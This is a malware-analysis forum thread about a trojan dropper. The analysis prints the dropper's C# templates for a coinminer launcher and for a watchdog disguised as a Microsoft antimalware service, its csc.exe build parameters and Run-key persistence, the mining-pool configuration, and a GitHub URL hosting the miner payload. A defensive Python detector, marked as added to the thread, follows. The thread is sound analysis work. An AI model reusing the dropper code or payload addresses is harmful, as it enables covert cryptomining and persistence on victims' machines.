A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32419  by hackr8
 Thu Jan 10, 2019 4:45 pm
This file is detected as many different things and that really confused me.
Can someone find what it actually is?
This file is according to VT a:
1.Generic
2.Riskware
3.CoinMiner
4.Trojan
5.PUA
6.Hack Tool

dl: hxxp://b.reich.io/rxipyy.exe

Virus Total (49/69): https://www.virustotal.com/#/file/13ee1 ... 17/details
Attachments
password: infected
(599.66 KiB) Downloaded 27 times
 #32422  by EP_X0FF
 Fri Jan 11, 2019 1:04 pm
At first, this is a trojan muldrop. It contains a resource DLL with C# source code that is modified by the dropper and then compiled with csc.exe at runtime. Additionally it creates multiple embedded directories with pseudo-random names to store its files.

The source dll has 2 templates:
Code:
using System;
using System.Diagnostics;
using Microsoft.Win32;
using System.Drawing;
using System.IO;
using System.Reflection;
[assembly: AssemblyTitle("{GETNAME]")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("{GETCOMPANY]")]
[assembly: AssemblyProduct("{GETPRODUCT]")]
[assembly: AssemblyCopyright("Copyright ©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace IconStealer
{
    class Program
    {
        static void Main(string[] args)
        {
            string appexe= @"((APPEXE))";
            string wdir=@"((WDIR))";
            if (File.Exists(appexe))
            {
                Process miner = new Process();
                miner.StartInfo.FileName = appexe;
                miner.StartInfo.UseShellExecute = true;
                miner.StartInfo.WorkingDirectory = wdir;
                miner.Start();
            }
        }
    }
}

using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright ©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Valhalla
{
    class Class1
    {
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = @"((APPEXE))";
			  string wdir=@"((WDIR))";
			Process miner;
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=false;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
            }
        }

        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("((DEFEXE))");
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("((HOSTEXE))");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
    }
} 
One of the templates after runtime modification looks like this:
Code:
using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright ©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Valhalla
{
    class Class1
    {
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = @"C:\RecoveryLog\2hc4tp\73dcn\7bp8choxq\a67y6h6wb6phi9\m8gusmmezip78c6\v2xa7utij6a\2ikja86k4fntx4f\vl8g2acbcbel3in\hostsys.exe";
			  string wdir=@"C:\RecoveryLog\2hc4tp\73dcn\7bp8choxq\a67y6h6wb6phi9\m8gusmmezip78c6\v2xa7utij6a\2ikja86k4fntx4f\vl8g2acbcbel3in\";
			Process miner;
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=false;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
            }
        }

        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("consystem");
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("hostsys");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
    }
}
And compiled with the following params:
Code:
/t:exe /utf8output /R:"System.dll" /R:"mscorlib.dll" /out:"C:\RecoveryLog\1oejmr3i\886ykx44c6\bvnam1zw\469ndl\xt88mcv1\consystem.exe" /debug- /optimize+ /t:winexe  "C:\Users\<user>\AppData\Local\Temp\0hutooe1.0.cs"
Autostart is registered via the HKCU Run key.

Names of the dropper and the "self-protect" application are hardcoded.

The payload of all this C# idiocy is a coinminer, configured this way:
Code:
stratum+tcp://xmr.pool.minergate.com:45560  balanc3r@tuta.io
and downloaded from a GitHub page created by (likely) this trojan's author:
Code:
https://github.com/ventriano/vent/blob/master/CPU32.zip?raw=true
(https://www.virustotal.com/en/file/cd38 ... /analysis/)

Warning: everything from this repository should be considered risky.
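As a defender-side addition that is not part of the thread (and not EP_X0FF's tool), here is a small Python check that scores a csc.exe command line like the one quoted above for the runtime-compilation traits this post describes: a .cs source sitting in the user's Temp directory, a windowless target, release-style flags, and an output path built from pseudo-random directory names. The sample command line is the one from the post with the <user> placeholder kept as-is; the regex for "random-looking" names and the score threshold are my own assumptions.

```python
import re

# Constructed sample: the csc.exe argument string quoted in the post above,
# with the <user> placeholder left exactly as it appears there.
SAMPLE_CMDLINE = (
    r'/t:exe /utf8output /R:"System.dll" /R:"mscorlib.dll" '
    r'/out:"C:\RecoveryLog\1oejmr3i\886ykx44c6\bvnam1zw\469ndl\xt88mcv1\consystem.exe" '
    r'/debug- /optimize+ /t:winexe  "C:\Users\<user>\AppData\Local\Temp\0hutooe1.0.cs"'
)

TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')  # argv-style split that honours quotes
RANDOM_DIR_RE = re.compile(r'^(?=.*\d)(?=.*[a-z])[a-z0-9]{5,16}$')  # assumed shape, e.g. 1oejmr3i

def parse_csc_args(cmdline):
    """Return (options, sources); a repeated option keeps its last value, as csc does."""
    opts, sources = {}, []
    for tok in (t.replace('"', '') for t in TOKEN_RE.findall(cmdline)):
        if not tok.startswith('/'):
            sources.append(tok)
            continue
        body = tok[1:]
        if ':' in body:
            name, _, value = body.partition(':')
        else:  # /debug-, /optimize+ and bare switches such as /utf8output
            name, value = (body[:-1], body[-1]) if body[-1:] in ('+', '-') else (body, '+')
        opts[name.lower()] = value
    return opts, sources

def random_dir_depth(path):
    """Count directory components that look machine-generated (letters mixed with digits)."""
    parts = path.replace('/', '\\').split('\\')[1:-1]  # drop the drive and the file name
    return sum(1 for p in parts if RANDOM_DIR_RE.match(p))

def assess_csc_invocation(cmdline):
    """Collect the runtime-compilation indicators this dropper's csc.exe call shows."""
    opts, sources = parse_csc_args(cmdline)
    out = opts.get('out', '')
    target = (opts.get('t') or opts.get('target') or '').lower()
    reasons = []
    if any('\\appdata\\local\\temp\\' in s.lower() for s in sources):
        reasons.append('source compiled straight from the user Temp directory')
    if target == 'winexe':
        reasons.append('windowless target (/t:winexe), so no console is shown to the user')
    if opts.get('debug') == '-' and opts.get('optimize') == '+':
        reasons.append('release flags (/debug- /optimize+) with no build system in sight')
    depth = random_dir_depth(out)
    if depth >= 3:
        reasons.append(f'{depth} pseudo-random directory names in the output path')
    return {'out': out, 'sources': sources, 'reasons': reasons, 'suspicious': len(reasons) >= 3}
```

Fed a process-creation log (Sysmon event 1 or 4688 with command-line auditing), the same function flags the csc.exe call of this dropper while a normal developer build from a project directory scores zero.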
 #32425  by hackr8
 Fri Jan 11, 2019 2:44 pm
EP_X0FF wrote: Fri Jan 11, 2019 1:04 pm
But how did you find the source code? It is obviously obfuscated.
CodeReflect gave me this when I tried to decompile it:
Code:
Shared Sub NULL-SHIELD_Stop-unpacking-this-tool||You_can_not_unpack_this_programáâãäåæçèéêë7qìKîïðñ7qóôõö÷øùNULL-SHIELD_Stop-unpacking-this-tool-<Module>You_can_not_unpack_this_program||NULL-SHIELD_Stop-unpacking-this-tool()

End Sub
 #32428  by EP_X0FF
 Fri Jan 11, 2019 4:40 pm
With the help of a self-designed physical memory analysis tool. All these obfuscators produce the original data/code at runtime, otherwise nothing would work.